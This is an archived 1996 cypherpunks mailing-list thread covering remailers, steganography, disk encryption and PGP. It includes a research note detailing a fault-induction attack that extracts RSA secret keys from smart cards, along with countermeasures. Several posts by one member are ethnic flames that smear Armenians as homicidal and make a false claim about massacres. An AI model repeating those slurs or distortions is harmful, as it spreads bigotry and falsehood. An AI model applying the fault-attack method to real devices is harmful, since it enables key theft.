recipient.  Unfortunately, if the NSA owned remailers ever get
sufficient in proportion the system would be broken whenever an NSA
remailer was chosen as an entry point.  (This assumes you also encrypt
communications between remailers with a remailer specific key, or a DH
negotiated key.)

There are signature schemes which allow signatures to be made with a
secret shared key without revealing the shares.  (Each share holder
adds a partial signature, up to the threshold when a full signature is
generated).  Are there algorithms which can do the same thing for
decrypting, so that we could have remailers adding partial decrypts?
Are there algorithms to generate a public/private key pair such that
no one ever needs to be trusted to do the split without keeping the
key?

Adam
--
Have _you_ exported RSA today?
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Wed, 23 Oct 1996 15:05:50 -0700 (PDT)
To: project_31@alias.cyberpass.net
Subject: Re: Call for Discussion - Time-Delay Protocol
In-Reply-To: <199610230807.BAA14932@sirius.infonex.com>
Message-ID: <199610230205.DAA00785@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



<project_31@alias.cyberpass.net> writes:
> [Though I have posted this to the group four previous times, I have not
> seen it - or any replies to it - in my incoming cypherpunks list

Not seen it either.

> Very simply put, it is desired to put an encrypted, paragraph-length
> message into ubiquitous public distribution, contained in an explanatory
> plaintext.
> 
> On a predetermined date stated in the plaintext, the passphrase is to be
> released and the parties holding the message may decrypt the cyphertext
> and know its contents.
> 
> An undetermined number of persons and organizations would have a high
> pecuniary and reputational interest in...
> 
>         1.  Knowing the contents of the encrypted message before the
>             passphrase is publically released.

2048 bit PGP signatory key, long passphrase conventional encryption.
If you are doubtful of the entropy of the passphrase you could encrypt
with a second PGP public key signed by the first, and simply reveal
the secret key.

Post the message to cypherpunks via a nice long chain of mixmaster
remailers.  (Then you can't be coerced into releasing the key early).

>         2.  Counterfeiting both the explanatory message and enclosed
>             cyphertext to include their own content, then placing the
>             spoofed message into wide distribution as genuine, or
>             flooding the net with multiple spoofs.

Spoofing is difficult to prevent because anyone can repeat what you
are doing, publish a key, publish the explanatory text and encrypted
message, then post the decrypt key later.

>         3.  Discrediting the message by attacks on its protocol
>             integrity in terms of date of release, modification after
>             stated date of release and any other valid (or invalid)
>             objections that may occur to them.

With Tim May's BlackNet key, there were several after the fact
attempted spoofs of it, people publishing other keys with "BlackNet"
as the key id, as a kind of denial of service attack.

Getting a timestamp from a PGP timestamping service on the key, and
also having the encrypted message and explanatory text timestamped
before releasing it would help.  Then people couldn't spoof unless
they knew before hand what kind of topic your release would be about,
so that they could pre-sign a selection to pick from as a spoof.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas B. Renner" <dougr@skypoint-gw.globelle.com>
Date: Tue, 22 Oct 1996 21:54:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Stego via TCP/IP (was Re: crypto wish list)
In-Reply-To: <199610210018.RAA20993@dfw-ix5.ix.netcom.com>
Message-ID: <Pine.3.89.9610230212.A1846-0100000@skypoint-gw.globelle.com>
MIME-Version: 1.0
Content-Type: text/plain




> >>>Where is highly sophisticated stego?
> >>What are our options?
> >>- Stego in english text.
> >>- Stego in audio and graphic file formats
> >>- Stego in Internet Phone protocols.
> >>- Stego in Internet video conference formats
> 

Stego in packet timing variations!

The ultimate NSA grep nemesis.   My gut tells me that this information is 
not collected by big bro.   Of course it would be very low bandwith and 
high noise...  But with higher-speed links, and the Internet of 
tomorrow, these will diminish vastly in significance.

Imagine a Linux kernel patch which precisely tracks packet timings 
by every originating host, and modulates the timing of return packets.  A 
full-duplex, error-corrected protocol could be built on top of this 
subtle exchange of information.


-Doug Renner
(Author of several industrial protocols for a previous employer)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 23 Oct 1996 03:16:09 -0700 (PDT)
To: Michael B Amoruso <cypherpunks@toad.com
Subject: Re: Finally -- A crypto question from me...HD encryption
In-Reply-To: <Pine.SCO.3.91.961022163414.27227C-100000@deepthought.armory.com>
Message-ID: <199610231027.FAA14422@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SCO.3.91.961022163414.27227C-100000@deepthought.armory.com>, on 10/22/96 at
04:36 PM,
   Perry Farrell <pneyz@armory.com> said:

>On Tue, 22 Oct 1996, Michael B Amoruso wrote:

>> Are there any good programs out there that can encrypt my HD??  Since
>> there probably are, please mention some and where I can get them.  Also,
>> no one mention PGP.

>Yes, the KOH disk encryption system. It is a small little thing that 
>encrypts the FAT (I believe) and nothing will work unless you know the  password. I
>also have a thing from the Navy that they use on their 
>computers which might encrypt the HD (I haven't checked it out yet). You  can find
>KOH at just about any extensive file listing of crypto or 
>hacking stuff. Try to find Silicone Toad's File Resources, as it has the  program.

>					pneyz (pneyz@armory.com)

Well if you are running OS/2 you might want to check out:

http://www.carbonbased.com.au/csinfo.htm

They have an ISF (installable file system) that supports DES & 3DES in ECB & CBC
modes.

I personally haven't check this product out but bookmarked the page as it is the
first crypto IFS I have found.

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: OS/2, Windows/0





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 23 Oct 1996 04:32:38 -0700 (PDT)
To: stewarts@ix.netcom.com
Subject: Re: Finally -- A crypto question from me...HD encryption
In-Reply-To: <199610230813.BAA16954@toad.com>
Message-ID: <199610231238.HAA02164@homeport.org>
MIME-Version: 1.0
Content-Type: text


stewarts@ix.netcom.com wrote:

| Others just try to encrypt the FAT or other headers and therefore don't
| stop Bad Guys from grepping through your disk for real data.
| Your Macintosh mileage may vary.  For Unix-like systems there's CFS, Matt

On the Mac, theres CryptDisk to encrypt a partition or virtual disk,
and Curve Encrypt for files.  Both use IDEA.

Adam


-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: inssdl@dstn21.dct.ac.uk (inssdl)
Date: Wed, 23 Oct 1996 00:01:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Norton Your Eyes Only
Message-ID: <9610230701.AA14145@dstn21.dct.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I've just managed to get hold of a copy of this program. Does anyone
know what algorithms are used within the encryption/decryption parts of
the program or is it just an overgrown version of Norton's DISKREET?

    ++ Please note new e-mail address and new web page location ++
**********************************************************************
David Lucas PGDip Software Engineering @@ BEng(Hons) Civil Engineering
Postgraduate Software Engineer, University of Abertay Dundee, SCOTLAND
@ E-mail: inssdl@dstn21.dct.ac.uk @ 2+2 = 5  for large values of two @
If you're not living on the edge, then you're taking up too much space
Organisations can't have opinions, only people can and these are mine.
Dave's Doorstep is back!!!! - http://river.tay.ac.uk/~i95dl/index.html
**********************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 23 Oct 1996 08:17:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NEWS]
Message-ID: <NP69VD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


SECURE INTERNET COMMERCE IS FOCUS OF SEVERAL PROJECTS
Visa Europe is testing a payment card designed for secure use in commerce
across the Internet, and hopes to bring it to market early in 1998. "We are
launching a pilot of our new card for secure electronic commerce with 38
banks around Europe in 16 countries," Steve Schapp, executive vice-president
marketing of Visa Europe said. "We expect Internet commerce to range from
between $7 billion and $32 billion a year by 2000 world-wide, extending Visa
payment service into a new environment," Schapp said. In a related story, a
group of Singapore scientists said they had invented a secure system for
financial transactions on the Internet. The system would allow individuals
and businesses to deal directly with banks via the worldwide computer
network, said Lam Kwok Yan, spokesman for a group of researchers at the
National University of Singapore (NUS). He said the new system, developed by
the NUS team in collaboration with several banks, used smartcard technology
which allowed the transmission of hidden digital signatures. The system,
which uses Microsoft's Windows 95 operating system, should be ready for use
by sponsoring banks by March 1997. Sponsors include Singapore's four large
banks -- Development Bank of Singapore, Oversea-Chinese Banking Corp.,
Overseas Union Bank, United Overseas Bank -- as well as Singapore
Telecommunications and Citicorp's Citibank.
-- Reuter, 10/22/96

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 23 Oct 1996 08:17:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [SERDAR ARGIC] Ray "GAK" Arachelian's role in the murder of 2,500,000 Turks,
In-Reply-To: <Pine.SUN.3.91.961022125859.175A-100000@beast.brainlink.com>
Message-ID: <yq69VD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:
> My ancestors are not a topic for the cypherpunks, and if you go and read
> messages sent by me your way have zero refrences to your ethnic
> background.  Your racially loaded, "dandruff-covered" vitriolic flames
> have no place here.  However this is totally irrelevant since the subject
> is off topic. 

I used to think that ethnic flames were off-topic for cypherpunks, but seeing
how Timmy May and his friends sput off every day about "crazy Russians", I'm
beginning to think that it may be on-topic.

Surely the fact that Armenians have massacred more Jews and Moslems during
20th century alone than there are Armenians has certain connections to
assassination politics.

> As for "censorous flamer" you sir have done plenty to make my filtered 
> list thrive.  I have received by far more new subscribers to the filtered 
> version than ever before.  Why?  Because everyone is tired of you and 
> your silly flames.  Were I mercenary enough to charge money for the 
> filtered list, you, sir would have made me a rich man.

I pity the fools who want a genodical maniac to filter what they read.

> However, you are doing nothing to hurt me in any way.  I don't care what 
> your oppinions are as to my ancestry, nor do I care to satisfy them one 
> way or another by answering your cretinous flames.

You certainly write several times more on this subject than I do.

> You seem to think that you can get away with anything. But keep pushing, 
> eventually you'll say something that will wind you up with a slander suit.

Spoken like a true Libertarian. They always threaten to sue for
libel whenever they disagree with someone.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 23 Oct 1996 08:14:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: WOW!
In-Reply-To: <Pine.SUN.3.91.961021192936.11167G-100000@beast.brainlink.com>
Message-ID: <o669VD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:
> 
> Pledge the rest to an AP fund. :)  I'd say that would be a good use of 
> the funds.
> 
I guess one can always recognize the Armenian heritage by the homicidal
tendencies...

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 23 Oct 1996 08:15:20 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Timmy May is a jerk
In-Reply-To: <Pine.SUN.3.91.961022175750.175B-100000@beast.brainlink.com>
Message-ID: <1969VD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Arachelian <sunder@brainlink.com> writes:
> So what do you contribute other than copyrighted news postings and huge 
> flames, and do so without the author's permission? Or do you have their 
> written permission?

You have a point thee - I'll stop, not because IBM or Netscape might mind
my reposting their press releases here, but because I've recept some pretty
rude e-mail from John Gilmore telling me to stop posting off-topic to this
mailing list, which has turned into a playground for Timmy May and other
inane flamers. Clearly, anything "crypto-relevant" is off-topic. Only ethnic
flames about Cossacks (???) and religious flames about mormons, posted 
prodigiously by Timmy May and his cohorts, are on-topic.

P.S. I do have Dr. Argic's permission to repost his collection of materials
on the genocide of Jews and Moslems by Armenians.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: deng@iss.nus.sg (Robert Deng)
Date: Tue, 22 Oct 1996 18:35:14 -0700 (PDT)
To: yiqun@rsa.com
Subject: A new attack to RSA on tamperproof devices
Message-ID: <9610230138.AA01250@aquarius.iss.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain



              A New Attack to RSA on Tamperproof Devices


                   Feng Bao (baofeng@iss.nus.sg)
                   Robert Deng (deng@iss.nus.sg)
                   Yongfei Han (yfhan@iss.nus.sg)
                   Albert Jeng (jeng@iss.nus.sg)
                   Teow Hin Nagir (teowhin@iss.nus.sg)
                   Desai Narasimhalu (desai@iss.nus.sg)
                  
                     Information Security Group
                     Institute of Systems Science
                     National University of Singapore

                          23rd October 1996


In September 96, Boneh Demillo and Lipton from Bellcore announced a new type 
of cryptanalytic attack against RSA-like public key cryptosystems on tamperproof 
devices such as smart card (see, e.g., http://www.bellcore.com/PRESS/ADVSRY96/
medadv.html). However, due to the sketchiness of the Bellcore attack, it is
impossible to perform a meaningful assessment of this attack until more detailed
information becomes available.

On October 18, Eli Biham and Adi Shamir published their new attack, called 
Differential Fault Analysis (DFA), to secret key cryptosystems, such as DES. 
Some concrete ideas on how this attack works were revealed in their announcement 
(see, e.g., http://jya.com/dfa.htm).

Our work here was motivated first by the Bellcore announcement and then by the 
DFA announcement. We present an attack to RSA on tamperproof devices. At the 
time of writing, we have no idea whether our attack is similar to the Bellcore 
attack. 

We make the following assumption as in the Bellcore and DFA announcements.

Assumption: By exposing a sealed tamperproof device such as a smart card to 
certain physical effects (e.g., ionizing or microwave radiation), one can induce 
with reasonable probability a fault at a random bit location in one of the 
registers at some random intermediate stage in the cryptographic computation.
(We will explain later that our attack also works against multiple bit faults).

Without loss of generality, assume that n=pq in RSA is a 512 bit number. Let e be 
the public exponent which is publicly known and d be the secret exponent which 
is stored inside the tamperproof device. Let P be a plaintext, then the 
corresponding ciphertext is
                              C = P^e                           (1)

(In the following, only residues modulo n are shown, e.g., we use P^e instead 
of P^e mod n). 

We denote the binary representation of the secret exponent as

             d = d511|d510| ...|di|...|d1|d0                    (2)

where di, takes value 1 or 0, is the ith bit and where x|y denotes concatenation 
of x and y. Further, we denote

            C0=C, C1=C^2, C2=C^{2^2}, ..., C511=C^{2^511}       (3)

Given C and d, we can express the corresponding plaintext P as

      P=(C511^d511)(C510^d510)...(Ci^di) ...(C1^d1)(C0^d0)      (4)
       

We assume that the attacker is in physical possession of the tamperproof device 
and that he can repeat the experiment with the same key by applying external 
physical effects to obtain outputs due to single bit errors.

To simplify the description, we illustrate our attack by two examples.

EXAMPLE 1:

Suppose that one bit in the binary representation of d in equation (2) is 
changed from 1 to 0 or vice versa, and that the fault bit position is randomly 
located.

An attacker arbitrarily chooses a plaintext P and computes the ciphertext C 
using (1). He then applies external physical effects to the tamperproof device 
and at the same time asks the device to decrypt C. Assuming that di in (2) is 
changed to its complement di', then the output of the device will be
 
        P'=(C511^d511)(C510^d510)...(Ci^di') ...(C1^d1)(C0^d0)   (5)

Since the attacker possesses P, he can compute 

                     P'/P = Ci^di'/Ci^di                         (6)

Obviously, if P'/P = 1/Ci, then di = 1, and if P'/P = Ci, then di = 0. The attacker 
can re-compute Ci and 1/Ci for i = 0, 1, ..., 511, and compares (6) to these values 
in order to determine one bit of d. The attacker can repeat the above process 
using either the same plaintext/ciphertext pair or using different plaintext/
ciphertext pairs until he obtains enough information to uncover the binary 
representation of the secret exponent d.

EXAMPLE 2:

For the sake of simplicity, here we assume that in decrypting a ciphertext, the 
tamperproof device first computes the data sequence in (3) and then computes (4). 
We also assume that the attacker applies external physical effects to the tamperproof 
device to induce an one bit error in Ci, i = 0, 1, ..., 511. 

Suppose that the one bit error is in Ci, we denote the corrupted value as Ci'. Then 
the output from the tamperproof device is

       P'=(C511^d511)(C510^d510)...(Ci'^di) ...(C1^d1)(C0^d0)     (7)

The attacker can then compute

                       P'/P = Ci'^di/Ci^di = Ci'/Ci               (8)

(Note that di in (8) must be 1.) Suppose that the attacker has computed all the 
possible Ci'/Ci values in advance (there are a total of 512x512 such values) and 
stored them somewhere. Now the attacker can compare all these values with P'/P. 
Once a match is found, the attacker knows i then knows that di is 1. The attacker 
repeats the above process until he has enough information to determine d.

The above examples are just meant to illustrate the basic ideas of our attack. 
Anyway, by the two examples we showed that: One bit fault at certain location and 
time can cause fatal leakage of the secret key. Such leakage gradually increases 
as the above procedures are repeated using one or multiple pairs of P and C.

It should be noted that our attack also works for multiple bit errors. Assuming 
two bit faults and consider the scenario of EXAMPLE 2. The possible Ci'/Ci values 
now increases from 512 x 512 to 512 x 512 x 512. In this case, matching P'/P 
requires more time, while with large possibility you obtain 2 di's once a match
is obtained. 
  
To conclude this research note, we would like to say a few words on how to resist 
this kind of attacks.

1. The attack may be avoided by calculating values 2 times and checking the two 
results. However, this approach doubles the computational time. As pointed out 
by Bellcore, this double computation method also avoids their attack.

2. In many cases, the encryption key e is usually small. So we can verify the result 
by checking 
     
                               P^e= C ?

This approach is much more efficient than the double computation approach if e is 
small.

3. In some protocols for digital signature, a random string is chosen by the smart
card and concatenated to a message m which is to be signed by the smart card. For
example, m is a 412 binary string given to the smart card. The smart card randomly
chooses a 100 bit number r and the output is (C|r)^d. Since r is different each time,
the attack does not work in such case.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 23 Oct 1996 11:11:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Password Thief for Windows 95 (fwd)
In-Reply-To: <Pine.GUL.3.95.961023002458.5909A-100000@Networking.Stanford.EDU>
Message-ID: <v03007872ae93d09fce80@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



> You can now find the Password Thief for Windows 95 on the
> Internet.  This small utility sits around in your system
> quitely logging all password that were typed.  This includes
> login, screen saver, etc

Be careful. You might owe a royalty to First Virtual.

;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Wed, 23 Oct 1996 07:32:35 -0700 (PDT)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: MD5?
In-Reply-To: <Pine.SUN.3.94.961022212709.29900D-100000@polaris>
Message-ID: <199610231432.KAA14191@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


hi,

> Is MD5 essentially history?
> 
> Aside from MacPGP 2.6.3, is there a pgp version which will support
> anything else?

Since you asked this in the future tense, PGP 3.0 will support
SHA.1

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 23 Oct 1996 07:35:40 -0700 (PDT)
To: sunder@brainlink.com (Ray Arachelian)
Subject: Re: Netscape Show - Security API
In-Reply-To: <Pine.SUN.3.91.961017203037.10811A-100000@beast.brainlink.com>
Message-ID: <199610231541.KAA02706@homeport.org>
MIME-Version: 1.0
Content-Type: text


Ray Arachelian wrote:

| Everything is a plug in module, and you can even replace the crappy DES 
| and crippled RSA mods with stronger ones and even write a PGP signature 
| checker/signed/encryptor, etc for both server and browser.  Very cool 
| stuff. PGP was actually mentioned!

	Speaking of Netscape security, it would be nice to be able to
write code that controlled various settings on a per site basis, ie,
I'll take cookies from the New York Times (one per session), and as
many as Amazon.com wants to send, but nowhere else, and Javascript
only if its signed by Dr. Dobbs or comes from www.mycompany.com.

Adam


-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 23 Oct 1996 07:48:20 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Netescrow & Remailers?
Message-ID: <199610231554.KAA02772@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Would it make remailers more reliable to use a netescrow
system, so that if a remailer goes offline, the others can request its
keys, and continue moving its messages?

	To me, reliability is as large a problem as UI.  If the next
Mixmaster is going to do direct IP transport, reliability could
increase as a problem.

Adam



-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Wed, 23 Oct 1996 08:58:25 -0700 (PDT)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Stopping the buying of candidates
Message-ID: <199610231558.KAA25043@earth.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain



> At 08:13 PM 10/22/96 -0700, Declan McCullagh wrote:
(snip)

> Sure, you can't keep people from talking.  However, one way to sabotage the 
> usefulness of telling is to allow everybody else as well to make the same 
> claim, with essentially no way for the candidates to tell who is REALLY 
> giving the money.  Make the lie just as credible as the truth, and the value 
> of knowing the truth is destroyed.  If nobody can trust anyone else's word, 
> then no candidate could know who REALLY ought to be rewarded for a campaign 
> contribution, breaking the circle of quid-pro-quo.  

Sorry, but this would depend upon equal access to a number of things. 
Primarily, John Q. Public does not have sufficient real world access 
to politicians to assert that he is the one who donated.  Lobbyists, 
OTOH, most certainly do.  Secondly, access to the timing of donations 
is something only the donor can know.  

"Wink, wink.  Nudge, nudge, Senator.  Look at your account balance 
tomorrow.  Never forget the National Association of Manufacturers was 
there for you"  (Obviously a completely random selection 8-)

> The candidate still gets the money, of course, and the contributor is still 
> free to both donate and speak...separately.  The thing that's been cut off 
> is the association between the money and the speech...which is exactly what 
> the problem is, isn't it?

See above for why the connection is not.  And the problem is 
generally not money, but rather the delivery of votes.  A candidate 
will do whatever it takes to get elected.  Often this means $$$ for 
campaign expenses.  More often it means vote delivery.  

Get rid of the career politician and you get rid of the motivation 
behind the pursuit of political money and vote delivery.  I hate to 
actually advocate term limits, but a critical vote in Congress is 
much harder to control when the rep is only interested in serving the 
public because there is no chance of re-election.  After all, it is 
not donations that are the evil here, it is the control of gov't 
action, right?  (Much of this could all be solved by electing better 
people as our representatives.  Determined will can make a big 
difference)

> Jim Bell
> jimbell@pacifier.com
 
++++==============----------------------------
Matthew J. Miszewski |The information revolution has changed wealth: 
		     |intellectual capital is now far more important 
mjmiski@execpc.com   |than money.		-Walter Wriston
                         ----------------------------==============++++




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Wed, 23 Oct 1996 10:53:34 -0700 (PDT)
To: Adam Shostack <cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Netescrow & Remailers?
In-Reply-To: <199610231554.KAA02772@homeport.org>
Message-ID: <v03007800ae9417ae8f94@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


I don't think "escrow" is the salient feature of what Adam is hinting at,
or at least it's now what I'm focussing on here. Rather, I think the really
intriguing thing is using _logical_ names for remailers, and not
necessarily tying them to specific accounts, specific account owners, or
specific sites. ("Call by name," if you will.) This could make remailers
more persistent.

(A downside is that having remailers in flux is sometimes a good thing, as
it discourages users from using the same old chain. But this is a nit.)

At 10:54 AM -0500 10/23/96, Adam Shostack wrote:
>	Would it make remailers more reliable to use a netescrow
>system, so that if a remailer goes offline, the others can request its
>keys, and continue moving its messages?
>
>	To me, reliability is as large a problem as UI.  If the next
>Mixmaster is going to do direct IP transport, reliability could
>increase as a problem.

This seems like a very good idea. I have an idea for transitioning from the
current "physical site name" approach remailers are using, to perhaps a
"logical site name," where logical names (like "AliceRemailer") would be
aliased or mapped (through a collectively-maintained, or Raph
Levien-maintained (:-}) list of logical-to-physical site names. Thus, if
the physical site or physical account name which maintained the
"AliceRemailer" remailer and keypair were to vanish or have the account
yanked, another site/account could "inherit" the keypair (by suitable
arrangements) and the persistence of the site AliceRemailer would be
ensured.

But I have some questions about possible implementations. Suppose a
remailer is named "Alice@foo.bar," or "Alice" for short. Alice has a key,
AliceKey.

Now imagine that the Alice remailer goes down, for whatever reason. Alice
(the person or owner) can "authorize the release of AliceKey" to another
remailer of her choosing (or by prior arrangement, as a fallback remailer).
So, Bob takes over Alice's traffic.

However, some questions for this scenario:

-- users will have "Alice@foo.bar" in their scripts, or chains, or
whatever. So, having Bob have AliceKey is not ipso facto very useful. If
users have to respecify a site name, they might as well just switch to the
BobPublicKey, for example.

-- on the other hand, if a "logical name" could be used, where users see a
name like "AliceRemailer" instead of "Alice@foo.bar," then a remapping of
AliceRemailer to whatever site is still up and handling her private key
could provide a seamless transtion.

(This might require an address mapping table to be either publically
accessible, even to remailer scripts. But this seems doable. Even if "Joe
Sixpack" doesn't keep current on the mappings, the much smaller number of
remailer operators can certainly keep current on the mappings. So all Joe
Sixpack has to do is arrange the chain, e.g., (Alice (Emilio (Susan (Freda
(etc....)))) The remailers then pass the messages on to the physical site
matching the logical site. And to be clear, the user, Joe Sixpack, of
course has to have the public keys of each of the remailers he plans to
use.)

I don't see that this would create new security problems, as the private
keys for a logical remailer are only passed on to another site if and when
the remailer owner _wants_ to. (This is back to the familiar theme that the
owner of a private key can pretty do what he wants, including passing it on
to others.)

There are a lot of issues occurring to me now on this, but I think the
basic idea is sound.

--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Wed, 23 Oct 1996 11:40:02 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: ANother Timmy May clone
Message-ID: <9610231839.AA27883@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


I love it..... no repentance for posting useless flames..

But he apologizes for it being posted twice.

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: dlv @ bwalk.dm.com (Dr.Dimitri Vulis KOTM) @ smtp
Date: 10/22/96 10:46:36 PM
Subject: Re: ANother Timmy May clone

stewarts@ix.netcom.com writes:
> This is the second time you've posted this.
> It's an amusing product, if you like snake-oil, and more people would
> have read your article if it didn't include gratuitous insults,
> especially in the title.
>
> At 07:30 PM 10/20/96 -0400, you wrote:
> >Timmy-May-style pseudo-crypto:
...

I'm responding to the list since others may noticed the same:

I did not post this article twice. I was surprised to see that it came
back from toad.com to me twice. Some glitch much have caused is to be
duplicated. Hasn't happened to any other articles... Sorry about that.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Wed, 23 Oct 1996 09:10:26 -0700 (PDT)
To: attila <attila@primenet.com>
Subject: Re: MD5?
In-Reply-To: <Pine.BSI.3.95.961023155055.18225C-100000@usr10.primenet.com>
Message-ID: <199610231610.MAA14566@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> 	well, that is alright, &c.   BUT WHEN WILL 3.0 RELEASE?
>     it has been imminent for at least 2 years.

It'll be released when it's done, dammit!  And it's almost done!
Currently, I'm tracking down a few bugs, and a few details need to get
solidified, but other than that I have it working on my desktop and I
use it almost every day.

It's still got some testing to do, and it needs to get packaged up.
And it still needs to get cleaned up a lot (the UI ain't pretty --
even compared to 2.6.2!)  This is what is taking so long.

Come on, EVERY SINGLE LINE OF CODE WAS RE-WRITTEN!  And there are
about 60000 lines in PGP3!  That's a lot of work, and the
70-30/80-20/90-10 rule is hitting hard.

It's coming.  We're trying to get it out as fast as we can.  But
we're not going to sacrifice quality for a little bit of time.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jy@jya.com>
Date: Wed, 23 Oct 1996 09:29:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Chinese Gold Bar Mystery
Message-ID: <1.5.4.32.19961023162835.00691738@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


